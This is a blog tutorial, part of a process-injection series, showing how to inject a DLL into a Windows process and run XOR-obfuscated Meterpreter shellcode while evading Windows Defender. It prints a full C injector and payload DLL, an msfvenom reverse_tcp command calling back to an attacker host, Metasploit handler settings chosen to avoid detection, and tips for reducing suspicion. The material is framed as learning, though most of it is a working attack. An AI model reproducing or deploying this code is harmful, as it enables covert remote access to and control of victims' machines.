Process Injection Series Part II: DLL Injection

Published in

InfoSec Write-ups

7 min readAug 5, 2023

Using MITRE Technique T1055.001 to bypass Windows Defender

Welcome to the next installment of the process injection series. We will be exploring DLL injection in this one. Get your Visual Studio and MSDN pages ready to fully advance your knowledge on this topic!

Mandatory Disclaimer

Methods and code shown in this series are solely to be used as learning examples. I take no responsibility for the misuse of the methods and code shown.

DLL Injection, what is it?

As this is a continuation of my previous blog post, I’ll assume you already know what a process is.

You can think of DLLs (Dynamic-link Libraries) as small programs that a bigger program can load. DLLs export functions via their export table, that then other programs can use. An example of a DLL is Kernel32.dll. You can find the functions that this DLL provides here.

Loading Kernel32 allows a program to use the functions exported by it, rather than having to implement their own functions.

DLL injection abuses that fact, by creating a malicious DLL and loading it into the memory of the process an attacker can achieve code execution.

Source of the gif: https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

The steps to this attack are similar to PE injection. The attacker performs the following steps:

Obtains a handle on the target process
Allocates the required memory inside the process
Writes the DLL path (DLL is required to be on disk)
Starts a new thread

Once the DLL is loaded, it can execute its payload. The payload can wildly differ from cmd one-liners to shellcode injection. In this post, I’ll showcase the shellcode injection method as I believe it’s more OPSEC-friendly than starting a cmd prompt.

The DLL will:

Allocate memory for the shellcode
Copy the shellcode to the allocated space
Start a new thread

As in previous cases, the code will be available on my GitHub.

Writing the injector and payload

The code will use WinAPIs to achieve our goal. Unlike PE injection, this will require dropping a DLL to the disk of our target.

 int pid = atoi(argv[1]);

 printf("Obtaining handle to target process");
 HANDLE hProcess = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, 0, pid);
 if (hProcess == NULL) {
  Error("Failed in obtaining handle to process");
 }
 printf("Allocating memory...\n");
 void* buffer = VirtualAllocEx(hProcess, NULL, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 if (buffer == NULL) {
  Error("Failed in allocating memory");
 }
 printf("Writing memory...\n");
 if (!WriteProcessMemory(hProcess, buffer, argv[2], strlen(argv[2]), NULL)) {
  return Error("Failed in WriteProcessMemory");
 }
 printf("Creating remote thread...\n");
 HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
  (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryA"),
  buffer, 0, NULL);
 if (!hThread)
  return Error("Failed to create thread");
 printf("SUCCESS!");

As before, if you want to learn more about each of the functions, you can visit their respective MSDN page

Starting off, our injector opens a handle to the target process via OpenProcess. This function requires the following arguments:

Desired access to the process
Inherit value
PID of the target process

The desired access is a way to additionally reduce our detection rates. We could request full access to the process, but if we request only the bare minimum of permissions needed we can avoid suspicion.

The code obtains the PID via a command line argument, but there are ways to obtain a PID automatically. One example would be to use CeateToolhelp32Snapshot to create a snapshot of all processes and then iterate through them to find the desired target process.

It’s of course desired to handle any exceptions that could arise while using these functions, OpenProcesscan fail and the error should be handled.

Moving on, the next function used is VirtualAllocEx, which requires the following arguments:

Handle to a process
Pointer to a starting address (optional)
The size of memory to allocate
What type of memory to reserve
The memory protection of the allocated region

Here we can see the first difference between PE injection and DLL injection. Since in PE injection, we are writing shellcode, we need the memory location to be executable, this then leads to a memory location that has RWX permissions. In this case, a memory location with only RW permissions is sufficient, as the DLL won’t itself be executed.

Additionally the << is a binary operator, it’s effectively multiplying 1 by 2 to the 12th power.

The next step is to write the path of our DLL into the allocated memory space. This is achieved via WriteProcessMemory, which takes the following arguments:

Handle to a process
Pointer to the base of the memory to write to
Pointer to the buffer containing the data to be written
Number of bytes to be written
A pointer to a variable that receives the number of bytes written (optional)

When providing the DLL path, make sure it’s the full system path. The DLL might be local to the injector but to the target process, it won’t be.

Finally, we start a new thread via CreateRemoteThread. This function requires the following arguments:

A handle to the process
A pointer to a SECURITY_ATRIBUT, if NULL uses the default security descriptor
Initial size of the stack, if 0 uses the default size of the executable
A pointer to the starting point of the function in the remote process
A pointer to the arguments to be passed to the thread function
A value that controls the state of the created thread
Pointer to a variable that receives the thread identifier

Here we can see an additional change, since we are using DLLs we need to use the LoadLibraryA function in the remote process, but to use CreateRemoteThread we need to obtain the address for the function we intend to use. We can use GetProcAddress to obtain the address of function, it requires the following arguments:

The module name
The desired function

GetProcAddress returns the address of LoadLibraryA, and since Windows guarantees that the location of all core DLLs and functions is the same across all processes, we can use that value in the remote process. Finally, we need to cast the return value to LPTHREAD_START_ROUTINE.

With that, we pass the execution flow to the DLL. The DLL will host our shellcode and inject it into the local process.

Note: DO NOT USE SHELLCODE FROM THE INTERNET

#include "pch.h"
#include "Windows.h"

unsigned char shellcode[] = "xor'd shellcode"

int run()
{    
    HANDLE hThread = nullptr;

    char key = 'key';
    int i = 0;
    for (i; i < sizeof(shellcode) - 1; i++)
    {
        shellcode[i] = shellcode[i] ^ key;
    }

 void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 memcpy(exec, shellcode, sizeof(shellcode));

    hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, NULL, 0, NULL);
    if (!hThread) {
        return 1;
    }
 //((void(*)())exec)();

 return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        run();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

I generated my shellcode with the following command msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f c.

To avoid AV, we need to obfuscate the shellcode. We can still use the simple XOR script I made for my previous injection technique.

We will also do a trick, we will declare our shellcode as a global variable. This in turn will move our shellcode from the .text section to the .data section of our DLL.

Our function run will first XOR our shellcode again (returning it to the original shellcode), after which it will allocate the memory needed using VirtualAlloc.

Here we can see the usual permission of RWX required. There is a way to make this less suspicious, we would first set the permissions to RW, write our shellcode, then set the permissions to RX to not invoke suspicion. Feel free to try and implement this as an exercise.

After allocating the space, we copy the shellcode to the allocated region. Now we can just execute that code? Right…?

Introducing LoaderLock, it’s a subsystem whose job is to ensure only one thread is ever modifying a module list at a given moment. It’s mostly a safeguard that ensures initialization and cleanup of tasks are done in a safe manner inside the DLL.

In our case, this prevents the running of the shellcode directly, but an easy “bypass” is just to create a new thread and execute the shellcode in that thread.

We add the function run to the DLL_PROCESS_ATTACH case to ensure it’s called as soon as the DLL is loaded. With that, we obtain code execution.

Bypassing Defender and Demo

If we were to run the injection as is, Defender would alert. After trial and error, I realized that the alert was happening on the 2nd stage payload, rather than on the initial payload. Luckily, Metasploit offers encoders for their 2nd stages. Additionally, we can set AutoLoadStdApi to false. This loads all the commands provided by Meterpreter. The reason we use that option is to reduce the probability of us being detected, we can always load the API after obtaining the shell.

The final reverse shell handler then looks like this:

msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set autoloadstdapi false
autoloadstdapi => false
msf6 exploit(multi/handler) > set stageencoder ppc/longxor
stageencoder => ppc/longxor
msf6 exploit(multi/handler) > run

And the demo:

The end

I’ll continue working on process injection as it’s a great learning opportunity. DLL injection in itself is not widely used, since it requires a DLL to be on disk, but reflective DLL loading is a way to avoid such an issue. These initial techniques and their code can be upgraded step-by-step to more advanced exploitation techniques. One should not disregard the basics when learning new things!

A few pointers to improve the code:

Find the target process automatically
Allocate memory space in a way that reduces suspicion
Use this to reduce the number of imports

Feel free to comment and reach out with questions, I’d gladly try to answer them :D.